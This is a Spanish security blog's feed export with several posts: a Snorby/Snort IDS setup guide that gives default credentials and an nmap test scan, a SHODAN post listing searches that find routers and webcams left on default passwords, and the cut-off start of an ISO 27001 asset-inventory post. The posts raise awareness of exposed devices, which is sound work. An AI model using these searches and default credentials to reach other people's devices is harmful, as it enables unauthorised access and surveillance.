<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW29OyyWpnm_vdNSdrYwaTN_9LxYj2ep-6pVxT1ZMSgYG5MorOSdL0rp1OMwIp3uGBTDBByC_mFH3pJxFI5HUgZ7sV3up1pCuzUbziKDFPK0x9ocVzDJU-Waeb4q8aCl1MS9ef_kjXO9w/s1600/2.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5579026535303941682" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW29OyyWpnm_vdNSdrYwaTN_9LxYj2ep-6pVxT1ZMSgYG5MorOSdL0rp1OMwIp3uGBTDBByC_mFH3pJxFI5HUgZ7sV3up1pCuzUbziKDFPK0x9ocVzDJU-Waeb4q8aCl1MS9ef_kjXO9w/s400/2.png" style="cursor: hand; cursor: pointer; display: block; height: 29px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a><br />
El viernes por la mañana se publicó un certificado para cifrar la aplicación y se nos acabó el juego. :(<br />
Aunque no conseguimos quedar segundos que era el objetivo, siempre es divertido un poco de hacking, y más durante estos eventos. <br />
Gracias a la organización por permitirnos pasar unos días así sin salir de A Coruña y ahora a esperar al <a href="http://www.rootedcon.es/">Rooted CON'2011</a>. :D<br />
<div style="text-align: right;">
Carlos López</div>
<div align="right">
Jesús Pérez</div>
<br />
<br />
<br />
<br />Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-22670294185127626532011-01-15T16:31:00.024+01:002012-02-11T18:16:49.150+01:00Snort "for dummies": Insta-Snort<div>
<div>
<span class="Apple-style-span"></span><br />
<div style="font-size: small;">
<div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span">Hoy voy a hablar de <a href="http://snorby.org/">Snorby</a>, n</span><span class="Apple-style-span" style="line-height: 16px;">o me centraré en los <a href="http://es.wikipedia.org/wiki/Sistema_de_detecci%C3%B3n_de_intrusos">sistemas de detección de intrusos</a> (IDS), ni en <a href="http://www.snort.org/">Snort</a> porque hay muchísima documentación al respecto. Snorby es un "fronted" para el IDS Snort, sus creadores tienen el objetivo de conseguir una herramienta altamente competitiva para la monitorización de redes tanto en entornos privados como empresariales.</span></span></span></div>
<div>
<span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><br /></span></span></span></div>
<div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span">Llevaba tiempo siguiendo el proyecto desde las versiones iniciales buscando algo similar </span></span><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span">al <a href="http://activeworx.org/programs/idspm/index.htm">IDS Policy manager</a> (sistemas Windows) para entornos Linux. Con la llegada de la versión 2.0 parece, bajo mi punto de vista, que comienza a estar preparado para su uso en entornos de producción. Aunque de momento no dispone de muchas de las funcionalidades del IDS Policy Manager, nos ofrece otras <a href="http://snorby.org/why">ventajas</a> y es mucho más bonito :). P</span></span></span><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span">odemos probar una demo en la siguiente dirección: </span></span><a href="http://demo.snorby.org/users/login">http://demo.snorby.org/users/login</a></span></div>
<div>
<span class="Apple-style-span"><br /></span></div>
<div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;">NOTA: </span><span class="Apple-style-span" style="line-height: 19px;"><i>demo@snorby.org/snorby</i></span></span></span></div>
</div>
<div style="font-size: small;">
<span class="Apple-style-span"><br /></span></div>
<span class="Apple-style-span"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ3M24l0lczDGI6XmkgSEz2e-bbvONxGig-1oEAu6Mk3Ore36cPQ6HvooZrDevAD_jxaGj8P2j4DsHmrDtruSbXeTQTS9KPKGi2Dlv0k6mAe9S0kWih8Gfg1DiTHGW3KvwCUG2F_VCcqg/s1600/1.png" style="font-size: small;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5564013405210706002" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ3M24l0lczDGI6XmkgSEz2e-bbvONxGig-1oEAu6Mk3Ore36cPQ6HvooZrDevAD_jxaGj8P2j4DsHmrDtruSbXeTQTS9KPKGi2Dlv0k6mAe9S0kWih8Gfg1DiTHGW3KvwCUG2F_VCcqg/s320/1.png" style="cursor: pointer; display: block; height: 118px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a><div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span><br />
<div>
<div style="line-height: 16px; text-align: center;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><br /></span></span></span></div>
</div>
</div>
</span></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTTkYlW221nBZU6uzAQhy8eVjARx9IemDKfj4KG6OYEG5ouLaeDnlCZ89skvsa5RgDmOGojrGMBjotoUxKKrnRYmldJYkRiD6gxMQqxjOjvWINOFDghxHkcQWLq4WFGe3zL4GXvAwqs0k/s1600/2.png"><span class="Apple-style-span"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5564013654089601602" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTTkYlW221nBZU6uzAQhy8eVjARx9IemDKfj4KG6OYEG5ouLaeDnlCZ89skvsa5RgDmOGojrGMBjotoUxKKrnRYmldJYkRiD6gxMQqxjOjvWINOFDghxHkcQWLq4WFGe3zL4GXvAwqs0k/s320/2.png" style="cursor: pointer; display: block; height: 252px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></span></a><br />
<div>
<div style="text-align: center;">
<span class="Apple-style-span"><br /></span></div>
</div>
<div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span><br />
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><span class="Apple-style-span">De las opciones que tenemos para la instalación prefiero <a href="http://www.snorby.org/Insta-Snorby-0.5.iso">Insta-Snort</a>, ya que es una distribución basada en<a href="http://www.turnkeylinux.org/">T</a></span></span></span><a href="http://www.turnkeylinux.org/"><span class="Apple-style-span"><span class="Apple-style-span">urnKey Linux</span></span></a><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><span class="Apple-style-span"> muy sencilla de instalar y que provee de todo lo necesario para que podamos disponer un sistema Snort+<a href="http://www.securixlive.com/barnyard2/index.php">Barnyard2</a> funcionando con una interfaz gráfica muy usable y para. De esta forma podemos estudiar la información que proporcionan los sensores de una forma cómoda y ordenada.</span></span></span></span></span></span></span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><br /></span></span></span></span></span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span></span><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span">La instalación no supone ninguna complicación, comentar simplemente que es recomendable obtener un código Oink para actualizar las reglas de Snort (<a href="https://www.snort.org/signup">registro</a>). De forma opcional, </span></span>podemos utilizar la nueva funcionalidad que permite analizar capturas de paquetes con formato .pcap, para ello debemos registrarnos en el proyecto <a href="http://www.openfpc.org/">OpenFPC</a>. Si necesitamos que snort escuche por otra interfaz que no sea eth0 debemos seguir <a href="https://github.com/Snorby/snorby/wiki/Change-Snort-Barnyard-interface-on-Insta-Snorby-0.5">este manual</a>.</span></span></span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><br /></span></span></span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span">Para acceder a la interfaz gráfica nos conectamos al servidor web de la máquina y utilizamos los datos del usuario administrador por defecto, es más que aconsejable crear otro administrador y eliminar éste una vez logueados.</span></span></span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><br /></span></span></span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span">NOTA: <span class="Apple-style-span"><i>snorby@snorby.org</i>/</span><span class="Apple-style-span"><i>snorby</i></span></span></span></span></div>
<div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span></span></span></span></span></span><br />
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></span></span></div>
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><i></i></span></span><span class="Apple-style-span" style="font-size: small;">Listo, en pocos pasos ya podemos disfrutar de nuestro IDS, en la imagen se ven varias alertas porque fue tomada unos días después de realizar la instalación, para comprobar su funcionamiento vamos a realizar un escaneo de puertos con el nmap a ver si lo detecta. En esta ocasión voy a ponérselo fácil, en otras realizaré pruebas mas complejas a ver como responde.</span></span></span></span></span></span></span></span></span></div>
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><i><br /></i></span></span></span></span></span></span></span></span></span></div>
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"></span><span class="Apple-style-span" style="font-size: small;"><i>nmap -F 192.168.0.X</i></span></span></span></span></span></span></span></span></span></div>
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><i><br /></i></span></span></span></span></span></span></span></span></span></div>
</div>
</div>
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYLKub89r4z7crMbGjwOkzDWZss_eNvYbIlytHlMA1lYvLVTkxwsGhcS7baJm6dqNB8snYZduxcYTWMwNgRqolOvQRvX_GJei_qYoAmBKPbIN_3fTacFSBeSIOYMkiBNP5GUgI5vvWJOQ/s1600/3.png"><span class="Apple-style-span"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5564019873456350178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYLKub89r4z7crMbGjwOkzDWZss_eNvYbIlytHlMA1lYvLVTkxwsGhcS7baJm6dqNB8snYZduxcYTWMwNgRqolOvQRvX_GJei_qYoAmBKPbIN_3fTacFSBeSIOYMkiBNP5GUgI5vvWJOQ/s320/3.png" style="cursor: hand; cursor: pointer; display: block; height: 219px; margin: 0px auto 10px; text-align: center; width: 320px;" /><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: none; font-size: small;">:)</span></span></a><br />
<div>
<div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span><br />
<div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span></span></span></span></span></span><br />
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></span></span></div>
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></span></span></div>
<div style="line-height: normal; text-align: right;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></span></span></span></span></span></span></span></div>
</div>
</div>
</div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-46259511046630899302010-07-20T13:13:00.009+02:002012-02-11T18:17:24.899+01:00Jugando con SHODAN<div>
<div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Ayer estuvimos jugando un poco con </span></span><span class="Apple-style-span" style="color: black;"><a href="http://www.shodanhq.com/" id="iqup" title="SHODAN"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">SHODAN</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">y me parece interesante dejar aquí plasmados algunos resultados bastante curiosos de las pruebas que fuimos haciendo. Para empezar, ¿qué es SHODAN? Es un buscador, para dar una explicación rápida diremos que en vez de buscar por contenidos como hace Google busca máquinas(servidores, routers, etc) que ejecuten el software que le especifiquemos, además permite filtrar los resultados por otros parámetros como países, puertos o versiones, en <a href="http://quahogcon.org/QC2010Archive/slides/schearer-shodan.pdf">este pdf</a> </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">lo explican con más detalle. </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Un buen punto de partida para familiarizarse con esta aplicación web son las </span></span><a href="http://www.shodanhq.com/browse" id="f31y" title="búsquedas populares"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">búsquedas populares</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, entre las que podemos encontrar algunas con resultados muy sorprendentes. </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br />
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Después de un rato trasteando se nos ocurrió buscar routers, </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">ya que con <a href="http://www.phenoelit-us.org/dpl/dpl.html">esta lista</a></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> de contraseñas por defecto</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">(o otra de las muchas que hay por ahí)</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para cada modelo y un poco de scripting se podrían hacer maravillas. A continuación dejo algunos ejemplos de búsquedas por modelo de router:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><a href="http://www.shodanhq.com/?q=DWL-G700AP"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=DWL-G700AP</span></span></a></div>
<div style="margin-bottom: 0px; margin-top: 0px;">
<a href="http://www.shodanhq.com/?q=rt314"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=rt314</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<a href="http://www.shodanhq.com/?q=wg602"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=wg602</span></span></a><br />
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">...</span></span></div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br />Como podíamos pensar en un principio lo del scripting para probar por fuerza bruta no es necesario ya que hay demasiados con la configuración por defecto:</span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicK6h81btGK8kWlExyMD3wBUBmXlUNycwGUuvJB-yJwvHU37VN6sAZZFj2gOw703H2-7GL8ddixSorpfBXzl5R_3xPbrRIzDCn0U-ueqylOJNNfDsZD7FgJTEAHvBJE5aGua0-S8-fIbo/s1600/imagen0"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495945378214300226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicK6h81btGK8kWlExyMD3wBUBmXlUNycwGUuvJB-yJwvHU37VN6sAZZFj2gOw703H2-7GL8ddixSorpfBXzl5R_3xPbrRIzDCn0U-ueqylOJNNfDsZD7FgJTEAHvBJE5aGua0-S8-fIbo/s320/imagen0" style="cursor: pointer; display: block; height: 215px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a><br />
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Hasta aquí vemos que son routers como podrían ser los de nuestra casa, la configuración por defecto puede ser por distintos motivos que pueden ir desde simples tormentas hasta que alguien lo reinició como le aconsejaron en el soporte de su ISP y no lo volvió a securizar por desconocimiento, por vagancia, por prisa... Por experiencia como clientes de más de un ISP no es extraño encontrarse que los técnicos que hacen la instalación en casas la dejen así por los mismos motivos.</span></span></div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br />Pero nos encontramos que incluso routers para cosas "más serias" supuestamente dentro de una empresa(la gente no suele tener de esos en su casa) están accesibles sin pedir ni usuario ni contraseña. Imaginemos por un momento que a alguien se le ocurriera instalar un sniffer en este router CISCO </span></span><a href="http://isc.sans.edu/diary.html?storyid=7609" id="z_em" title="como se explica en éste artículo"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">como se explica en éste artículo</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, podría capturar todo lo que pasase por cualquiera de las interfaces del router. Viendo las pocas molestias que se toman en cambiar las contraseñas y con todo lo que permite hacer un router de este tipo(crear VPNs por ejemplo) mejor no pensar en lo que se podría hacer desde aquí.</span></span><br />
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMSnN5PcDxTd7j6mU4MGWd6c_Mr4BOq-u-lSAIWGdfIluDUIUqV5y_BvhnBNRcLDdiVkR60um9FSIJLncDUUGtcbQZBpHxcqPxSOZeU_O29JAFQU4hqHgqnzhBrHIyy2cnJt1e_ke1UpQ/s1600/imagen1"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495945929519156178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMSnN5PcDxTd7j6mU4MGWd6c_Mr4BOq-u-lSAIWGdfIluDUIUqV5y_BvhnBNRcLDdiVkR60um9FSIJLncDUUGtcbQZBpHxcqPxSOZeU_O29JAFQU4hqHgqnzhBrHIyy2cnJt1e_ke1UpQ/s320/imagen1" style="cursor: pointer; display: block; height: 267px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Por si todo esto resultase poco sorprendente pensamos que pasaría con los sistemas de video-vigilancia, ¿estarían también expuestos con contraseñas por defecto? Pues parece que más de lo mismo, probamos con sencillas búsquedas como las siguientes:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br />
<div style="margin-bottom: 0px; margin-top: 0px;">
<a href="http://www.shodanhq.com/?q=webcam"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=webcam</span></span></a></div>
<div style="margin-bottom: 0px; margin-top: 0px;">
<a href="http://www.shodanhq.com/?q=video%2Bweb%2Bserver"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=video%2Bweb%2Bserver</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br />
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Y vemos que obtenemos multitud de resultados, las contraseñas por defecto de estos sistemas son un poco más difíciles de encontrar y no se si hay alguna lista parecida a la de antes pero en los manuales del producto o sitios como foros de los propios fabricantes no lleva mucho tiempo.</span></span></div>
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495946399255692274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi00VrvApGUmzd6-Offdyfj-E6ct3ogXg9HnNJNQQSQKDZKlb0Whln4rxKI4h6PkXuDt9-MnhHbx1YR_tWUnvmuOJWj9Wsn_-LbV_hTqkF2kkFi3mORxRHiFhpvTzNRwMSpCHAggtrukA0/s320/imagen2" style="cursor: pointer; display: block; height: 215px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></span></div>
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJnsWyfzjBWv2u4APEENy6Lt2u1-CbYIPdpyP_2ci-pmCFWbqcQ0yIOIWZXmpMyJhrgiu7GBtwFYRUttQc_CWi30nsmiv6tX6o4TiS4rsNTlbcFruEej9j1w3CFHlIJE1Cf2S0U9JR9qc/s1600/imagen3"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495946401755857842" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJnsWyfzjBWv2u4APEENy6Lt2u1-CbYIPdpyP_2ci-pmCFWbqcQ0yIOIWZXmpMyJhrgiu7GBtwFYRUttQc_CWi30nsmiv6tX6o4TiS4rsNTlbcFruEej9j1w3CFHlIJE1Cf2S0U9JR9qc/s320/imagen3" style="cursor: hand; cursor: pointer; display: block; height: 263px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a><br />
<div>
<div>
<span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Eso de que nos puedan estar grabando(tanto en el trabajo como en tu propia casa) y retransmitiendo por internet "casi" en abierto no creo que le haga mucha gracia a nadie, sin comentarios...</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span><br />
<div style="margin-bottom: 0px; margin-top: 0px; text-align: right;">
<span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Carlos López</span></span></span></span></span></span></span></div>
<div style="margin-bottom: 0px; margin-top: 0px; text-align: right;">
<span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></span></span></span></span></span></div>
</div>
</div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-40110737137289626962010-06-01T18:40:00.013+02:002012-02-11T18:19:54.017+01:00ISO 27001: Inventario de los activos de información<div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">Uno de los primeros pasos que debe seguir la entidad para adaptarse a la norma </span><a href="http://es.wikipedia.org/wiki/ISO/IEC_27001"><span class="Apple-style-span" style="font-size: small;">ISO 27001</span></a><span class="Apple-style-span" style="font-size: small;"> es realizar el inventario de activos que contendrá todos aquellos activos de información que tienen algún valor para la organización y que quedan dentro del alcance del </span><a href="http://es.wikipedia.org/wiki/Sistema_de_Gesti%C3%B3n_de_la_Seguridad_de_la_Informaci%C3%B3n"><span class="Apple-style-span" style="font-size: small;">SGSI</span></a><span class="Apple-style-span" style="font-size: small;">. En un principio puede parecer un poco abrumador para un principiante(como yo) por la enorme cantidad de activos que se te van ocurriendo por eso decidí empezar por clasificarlos de alguna forma, de entre las múltiples maneras que me encontré elijo la definida por los expertos del </span><a href="http://groups.google.com/group/iso27001security"><span class="Apple-style-span" style="font-size: small;">foro ISO27k</span></a><span class="Apple-style-span" style="font-size: small;"> ya que me parece la más completa, mostrando ejemplos de cada tipo y es válida para entidades de muy distinta naturaleza. Éste podría ser un buen punto para comenzar siempre teniendo en cuenta lo que nos aconsejan también en ese foro:</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><i><span class="Apple-style-span" style="font-size: small;">"Debido a que los activos son algo cambiante, incluso si pudieras cubrir absolutamente todo lo que hay hoy, mañana la situación sería un poco diferente y más en unas semanas, meses o años. Así que es perfectamente aceptable seguir con un inventario "suficientemente bueno por ahora", siempre incluyendo en el SGSI la revisión y actualización de procesos como parte de la mejora continua"</span></i></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">Traducción del artículo:</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">ACTIVOS DE INFORMACIÓN PURA</span></b></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;"><br /></span></b></span></span></div>
<div>
